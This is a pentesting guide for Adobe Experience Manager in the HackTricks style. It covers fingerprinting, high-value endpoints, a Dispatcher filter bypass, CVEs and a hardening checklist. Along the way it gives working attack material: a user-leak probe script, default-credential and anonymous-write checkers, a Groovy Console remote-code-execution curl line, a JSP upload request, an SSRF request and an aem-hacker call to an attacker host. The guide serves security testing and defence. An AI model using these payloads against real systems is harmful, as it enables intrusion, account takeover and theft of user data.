AEM (Adobe Experience Manager) Pentesting


tip

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Adobe Experience Manager (AEM, part of the Adobe Experience Cloud) is an enterprise CMS built on Apache Sling and Apache Felix (OSGi) over a Java Content Repository (JCR, Apache Jackrabbit Oak).
From an attacker's perspective, AEM instances very often expose dangerous development endpoints, weak Dispatcher filter rules, default credentials and a long tail of CVEs that Adobe patches with quarterly service packs.

The checklist below focuses on externally reachable (unauthenticated) attack surface that keeps showing up in real engagements (2022-2025).


1. Fingerprinting

```bash
$ curl -s -I https://target | egrep -i "aem|sling|cq|dispatcher"
X-Dispatcher: hu1            # added by the AEM Dispatcher; the value identifies the Dispatcher instance
```

Other quick indicators:

  • /etc.clientlibs/ static path present (returns JS/CSS).
  • /libs/granite/core/content/login.html login page with the "Adobe Experience Manager" banner.
  • </script><!--/* CQ */--> comment at the bottom of HTML.

2. High-value unauthenticated endpoints

| Path | What you get | Notes |
|---|---|---|
| `/.json`, `/.1.json` | JCR nodes via DefaultGetServlet | Often blocked by the Dispatcher, but the bypass below frequently works. |
| `/bin/querybuilder.json?path=/` | QueryBuilder API | Leaks the page tree, internal paths and user names. |
| `/system/console/status-*`, `/system/console/bundles` | OSGi/Felix web console | Asks for Basic auth (401) by default; if exposed and creds are found ⇒ bundle-upload RCE. |
| `/crx/packmgr/index.jsp` | Package Manager | Authenticated upload of content packages → JSP payload upload. |
| `/etc/groovyconsole/**` | AEM Groovy Console | If exposed ⇒ arbitrary Groovy / Java execution. |
| `/libs/cq/AuditlogSearchServlet.json` | Audit logs | Information disclosure. |
| `/libs/cq/ui/content/dumplibs.html` | ClientLibs dump | XSS vector. |

Dispatcher bypass trick

Most production sites sit behind the Dispatcher (the Apache httpd reverse-proxy module). The Dispatcher and Sling parse the request URL differently: the Dispatcher classifies the request by the extension it sees at the end of the path, while Sling still resolves the original servlet. Filter rules can therefore be bypassed by appending a semicolon, an encoded newline and an allowed static extension:

```http
GET /bin/querybuilder.json;%0aa.css?path=/home&type=rep:User HTTP/1.1
```

A single request like the one above frequently discloses user profile nodes, including e-mail addresses. P-T Partners published good guidance on this weakness.
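
The helper below, added here as an example and not part of the original page or of aem-hacker, generates the usual bypass forms for a servlet path, builds a QueryBuilder query for rep:User nodes, tells a real bypass hit apart from a stray 200 (a genuine CSS file or an HTML error page) and pulls the leaked ids and e-mail addresses out of the reply. The suffixes other than `;%0aa.css` and the sample JSON reply are assumptions (hand-constructed), not captures from a real host.

```python
"""Dispatcher-bypass probe helpers.

Added example for this page; not code from the original article or from aem-hacker.
Assumptions: BYPASS_SUFFIXES lists the suffix forms enumeration tools commonly try (the
";%0aa.css" form is the one shown above); SAMPLE_RESPONSE is a hand-constructed QueryBuilder
reply, not captured from a real host.
"""
import json
from urllib.parse import quote

BYPASS_SUFFIXES = (
    ";%0aa.css",       # semicolon + encoded newline + allowed extension (the request above)
    ".css",            # allowed extension appended directly
    "/a.css",          # allowed extension as a Sling suffix
    ".servlet/a.css",  # extra selector plus suffix
)


def bypass_variants(path: str, query: str = "") -> list[str]:
    """Candidate URLs for `path` that the Dispatcher may classify as a static asset."""
    urls = []
    for suffix in BYPASS_SUFFIXES:
        url = path + suffix
        if query:
            url += "?" + query
        urls.append(url)
    return urls


def user_leak_query(root: str = "/home", limit: int = 50) -> str:
    """QueryBuilder query for rep:User nodes; p.hits=full + p.nodedepth return profile children."""
    return (f"path={quote(root, safe='/')}&type=rep:User"
            f"&p.limit={limit}&p.hits=full&p.nodedepth=2")


def is_bypass_hit(status: int, body: str) -> bool:
    """True when a request sent with a static-asset suffix still got a QueryBuilder JSON reply."""
    if status != 200:
        return False
    try:
        data = json.loads(body)
    except ValueError:
        return False           # real CSS, an HTML error page, etc.
    return isinstance(data, dict) and "hits" in data


def extract_user_leak(body: str) -> list[dict]:
    """Pull user ids and profile e-mails out of a QueryBuilder response (rep:User hits only)."""
    found = []
    for hit in json.loads(body).get("hits", []):
        if hit.get("jcr:primaryType") != "rep:User":
            continue                                   # skip system users, groups, etc.
        profile = hit.get("profile") or {}
        email = profile.get("email")
        found.append({
            "path": hit.get("jcr:path"),
            "id": hit.get("rep:authorizableId"),
            "email": email if isinstance(email, str) and "@" in email else None,
        })
    return found


# Hand-constructed reply (what a leaking instance returns for user_leak_query()).
SAMPLE_RESPONSE = json.dumps({
    "success": True, "results": 3, "total": 3, "more": False, "offset": 0,
    "hits": [
        {"jcr:path": "/home/users/a/alice", "jcr:primaryType": "rep:User",
         "rep:authorizableId": "alice",
         "profile": {"jcr:primaryType": "nt:unstructured",
                     "email": "alice@example.com", "givenName": "Alice"}},
        {"jcr:path": "/home/users/system/workflow-service",
         "jcr:primaryType": "rep:SystemUser", "rep:authorizableId": "workflow-service"},
        {"jcr:path": "/home/users/b/bob", "jcr:primaryType": "rep:User",
         "rep:authorizableId": "bob",
         "profile": {"jcr:primaryType": "nt:unstructured"}},
    ],
})

if __name__ == "__main__":
    for url in bypass_variants("/bin/querybuilder.json", user_leak_query()):
        print("probe:", url)
    if is_bypass_hit(200, SAMPLE_RESPONSE):
        for rec in extract_user_leak(SAMPLE_RESPONSE):
            print("leaked:", rec)
```

Send each variant with a normal HTTP client and feed status and body to `is_bypass_hit`; only a JSON body with a `hits` key counts, so a 200 that is really the site's CSS or an error page is not reported as a finding.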


3. Common misconfigurations (still alive in 2025)

  1. Anonymous POST servlet – POST /.json (or any path) with :operation=import lets you plant new JCR nodes when anonymous holds jcr:write. Denying anonymous POST requests in the Dispatcher (not only for *.json) closes the external path; also remove the write ACL, which is the root cause.
  2. World-readable user profiles – the default ACL grants jcr:read on /home/users/**/profile/* to everyone.
  3. Default credentials – admin:admin, author:author, replication:replication.
  4. WCMDebugFilter enabled ⇒ reflected XSS via ?debug=layout (CVE-2016-7882, still found on legacy 6.4 installs).
  5. Groovy Console exposed – remote code execution by sending a Groovy script (this one runs id and prints its output):
    ```bash
    curl -u admin:admin --data-urlencode 'script=println "id".execute().text' https://target/bin/groovyconsole/post.json
    ```
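
To turn items 1 to 3 into a repeatable check, here is an added example (my code, not aem-hacker's) that probes anonymous read via DefaultGetServlet, anonymous write via the Sling POST servlet and the three default accounts. The HTTP transport is injected as a callable so the decision logic can run offline against a hand-built fake host; `urllib_transport()` wires it to a real target. The Granite form-login endpoint (`/libs/granite/core/content/login.html/j_security_check`, assumed to answer 200 for a valid pair with `j_validate=true` and 403 otherwise) and the scratch path used for the write probe are assumptions.

```python
"""Offline-testable probes for the misconfigurations above.

Added example for this page, not code from aem-hacker. The transport is injected as
fetch(method, path, data=None) -> (status, body) so the logic can be run against a hand-built
fake host. Assumptions: the Granite form login answers 200 to a valid j_username/j_password
with j_validate=true and 403 otherwise; SCRATCH does not already exist on the target.
"""
from urllib.parse import parse_qs, urlencode

DEFAULT_CREDS = (("admin", "admin"), ("author", "author"), ("replication", "replication"))
LOGIN = "/libs/granite/core/content/login.html/j_security_check"   # assumed endpoint
SCRATCH = "/content/usergenerated/pentest-probe"                   # assumed scratch path


def anonymous_read(fetch) -> bool:
    """Root node readable through DefaultGetServlet without credentials."""
    status, body = fetch("GET", "/.json")
    return status == 200 and "jcr:primaryType" in body


def anonymous_write(fetch, scratch: str = SCRATCH) -> bool:
    """Create a throwaway node with the Sling POST servlet, then delete it again."""
    status, _ = fetch("POST", scratch,
                      urlencode({"jcr:primaryType": "nt:unstructured", "probe": "1"}))
    if status not in (200, 201):          # Sling answers 201 for a newly created node
        return False
    fetch("POST", scratch, urlencode({":operation": "delete"}))   # clean up after ourselves
    return True


def default_creds(fetch) -> list[str]:
    """Which of the well-known default accounts still log in."""
    hits = []
    for user, pw in DEFAULT_CREDS:
        status, _ = fetch("POST", LOGIN,
                          urlencode({"j_username": user, "j_password": pw, "j_validate": "true"}))
        if status == 200:
            hits.append(f"{user}:{pw}")
    return hits


def run_all(fetch) -> dict:
    return {"anonymous_read": anonymous_read(fetch),
            "anonymous_write": anonymous_write(fetch),
            "default_creds": default_creds(fetch)}


def urllib_transport(base: str, timeout: int = 10):
    """Real transport: fetch(method, path, data) against base (e.g. https://target)."""
    import urllib.error
    import urllib.request

    def fetch(method, path, data=None):
        req = urllib.request.Request(base + path, method=method,
                                     data=data.encode() if data is not None else None)
        if data is not None:
            req.add_header("Content-Type", "application/x-www-form-urlencoded")
        try:
            with urllib.request.urlopen(req, timeout=timeout) as resp:
                return resp.status, resp.read().decode(errors="replace")
        except urllib.error.HTTPError as err:
            return err.code, err.read().decode(errors="replace")
    return fetch


def fake_vulnerable_host(method, path, data=None):
    """Hand-built stand-in for a badly configured instance (constructed, not captured)."""
    form = {k: v[0] for k, v in parse_qs(data or "").items()}
    if method == "GET" and path == "/.json":
        return 200, '{"jcr:primaryType":"rep:root","jcr:mixinTypes":["rep:AccessControllable"]}'
    if method == "POST" and path == LOGIN:
        ok = (form.get("j_username"), form.get("j_password")) == ("admin", "admin")
        return (200, "") if ok else (403, "")
    if method == "POST" and path.startswith("/content/"):
        return (200, "") if form.get(":operation") == "delete" else (201, "")
    return 404, ""


if __name__ == "__main__":
    print(run_all(fake_vulnerable_host))                   # offline demo
    # print(run_all(urllib_transport("https://target")))   # against a real target
```

The write probe deletes its own node, but run it only on a path you are authorised to touch, and remember that a 201 from the POST servlet already proves the misconfiguration even if the cleanup request fails.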
    

4. Recent vulnerabilities (service-pack cadence)

| Quarter | CVE | Affected | Impact |
|---|---|---|---|
| Dec 2024 | CVE-2024-43711 | 6.5.21 and earlier | Improper input validation → arbitrary code execution (requires low-privilege auth). |
| Dec 2024 | CVE-2024-43724, CVE-2024-43726 | 6.5.21 and earlier | DOM / stored XSS in the Move Page Wizard. |
| Dec 2023 | CVE-2023-48452, CVE-2023-48468 | ≤ 6.5.18 | DOM-based XSS via crafted URL. |
| Dec 2022 | CVE-2022-30683 | ≤ 6.5.13 | Cryptographic design flaw → decryption of stored secrets (needs low-privilege creds). |

Always check the APSB bulletin that matches the customer's service pack and recommend the latest release (6.5.22 on-premise / AMS, or the current Cloud Service release, 2024.11 when this table was compiled).


5. Exploitation snippets

5.1 RCE via dispatcher bypass + JSP upload

If the Sling POST servlet accepts anonymous writes, create a node that will become /content/evil.jsp (body parameters, URL-encoded: `:operation=import`, `:contentType=text/plain`, `jcr:data=<% out.println("pwned"); %>`):

```http
POST /content/evil.jsp;%0aa.css HTTP/1.1
Host: target
Content-Type: application/x-www-form-urlencoded

:operation=import&:contentType=text/plain&jcr:data=%3C%25%20out.println(%22pwned%22)%3B%20%25%3E
```

Then request /content/evil.jsp. If the JSP is executed it runs as the AEM process user. If the response contains the raw `<% ... %>` source instead, the node was created but is only being served back as a file: Sling executes scripts it resolves through its search paths (/apps and /libs by default), so verify execution rather than assuming it from a successful write.

5.2 SSRF to RCE (historical < 6.3)

```http
GET /libs/mcm/salesforce/customer.html;%0aa.css?checkType=authorize&authorization_url=http://127.0.0.1:4502/system/console HTTP/1.1
```

aem_ssrf2rce.py from aem-hacker automates the full chain.


6. Tooling

  • aem-hacker – Swiss-army enumeration script; supports Dispatcher bypass, SSRF detection, default-credential checks and more.
    ```bash
    python3 aem_hacker.py -u https://target --host attacker-ip
    ```
  • Content brute-force – recursively request /_jcr_content.(json|html) under discovered paths to find hidden components.
  • osgi-infect – uploads a malicious OSGi bundle via /system/console/bundles when credentials are available.

7. Hardening checklist (for your report's recommendations)

  1. Keep the instance on the latest cumulative service pack (as of Jul 2025: 6.5.22).
  2. Remove or rotate default accounts; enforce SSO/SAML for authoring.
  3. Tighten Dispatcher filters: deny by default, allow only the extensions the site needs, and explicitly deny URLs containing ;, encoded newlines (%0a), *.json and /bin/querybuilder* for anonymous traffic. Re-send the bypass request from section 2 after every filter change to confirm it is blocked.
  4. Disable or protect consoles (/system/console, /crx/*, /etc/groovyconsole) with IP allow-lists.
  5. Apply the Anonymous Permission Hardening package shipped by Adobe.
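
To show why item 3 matters, the following added example (my code, not Adobe's and not a complete Dispatcher implementation) models Dispatcher filter evaluation in Python: ordered rules, last match wins, default deny, with both the raw and the percent-decoded path tested against each glob. That model is a simplification and an assumption; the filters.any lines in the comments show the corresponding real syntax, with illustrative rule numbers. It runs the page's bypass request, the POST-servlet upload and a few normal site URLs through a typical permissive ruleset and through the hardened one.

```python
"""Toy evaluator for Dispatcher /filter rules.

Added example for this page; not Adobe's code. Model (assumed, simplified): each rule is
(type, method glob, url glob); rules are checked in order against the request path (query
string stripped) and the LAST matching rule wins, with deny as the default. Globs are tested on
both the raw and the percent-decoded path so an encoded newline is caught. The filters.any
lines in the comments are the equivalent real syntax; rule numbers are illustrative.
"""
from fnmatch import fnmatchcase
from urllib.parse import unquote

# A typical "it works" ruleset: deny everything, then re-allow by extension. It is the
# extension match that the ;%0aa.css trick abuses.
WEAK_FILTERS = [
    ("deny",  "*",    "*"),                  # /0001 { /type "deny"  /url "*" }
    ("allow", "GET",  "*.html"),             # /0002 { /type "allow" /method "GET" /url "*.html" }
    ("allow", "GET",  "*.css"),              # /0003 { /type "allow" /method "GET" /url "*.css" }
    ("allow", "GET",  "*.js"),
    ("allow", "GET",  "/content/*"),         # /0005 { /type "allow" /method "GET" /url "/content/*" }
    ("allow", "GET",  "/etc.clientlibs/*"),
    ("allow", "POST", "/content/*"),         # "needed for forms"; also lets the POST servlet through
]

# Hardening item 3: the same base plus explicit denies that run last and therefore win.
HARDENED_FILTERS = WEAK_FILTERS + [
    ("deny", "*",    "*;*"),                 # /0100 { /type "deny" /url "*;*" }  path parameters
    ("deny", "*",    "*\n*"),                # matches the decoded form of %0a
    ("deny", "*",    "*.json*"),             # /0102 { /type "deny" /url "*.json*" }
    ("deny", "*",    "/bin/querybuilder*"),  # /0103 { /type "deny" /url "/bin/querybuilder*" }
    ("deny", "*",    "/system/console*"),
    ("deny", "*",    "/crx/*"),
    ("deny", "*",    "/etc/groovyconsole*"),
    ("deny", "POST", "*"),                   # no anonymous POST; re-allow exact form handlers after this
]


def dispatcher_decision(filters, method, url):
    """Return (decision, index of the rule that decided it). Default deny, last match wins."""
    path = url.split("?", 1)[0]
    candidates = (path, unquote(path))
    decision, winner = "deny", None
    for i, (kind, method_glob, url_glob) in enumerate(filters):
        if not fnmatchcase(method, method_glob):
            continue
        if any(fnmatchcase(c, url_glob) for c in candidates):
            decision, winner = kind, i
    return decision, winner


PROBES = [
    ("GET",  "/bin/querybuilder.json?path=/home&type=rep:User"),
    ("GET",  "/bin/querybuilder.json;%0aa.css?path=/home&type=rep:User"),  # the bypass
    ("GET",  "/content/site/en.json"),
    ("GET",  "/content/site/en.html"),
    ("GET",  "/etc.clientlibs/site/clientlibs/site.css"),
    ("POST", "/content/evil.jsp;%0aa.css"),                                # POST-servlet upload
    ("GET",  "/system/console/bundles.html"),
]


def evaluate(filters):
    """Decision for every probe: {url: 'allow' | 'deny'}."""
    return {url: dispatcher_decision(filters, method, url)[0] for method, url in PROBES}


if __name__ == "__main__":
    weak, hard = evaluate(WEAK_FILTERS), evaluate(HARDENED_FILTERS)
    for url in weak:
        print(f"{weak[url]:5} -> {hard[url]:5}  {url}")
```

With the weak set, the bypass URL, the site's own `.json` views, the POST upload and even `/system/console/bundles.html` (it ends in `.html`) are all allowed; the hardened set denies each of them while ordinary `.html` pages and client libraries still pass, which is the property to re-check on the real Dispatcher after every change.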

References

  • Adobe Security Bulletin APSB24-69 – "Security updates for Adobe Experience Manager" (December 2024).
  • 0ang3el – aem-hacker (GitHub): https://github.com/0ang3el/aem-hacker
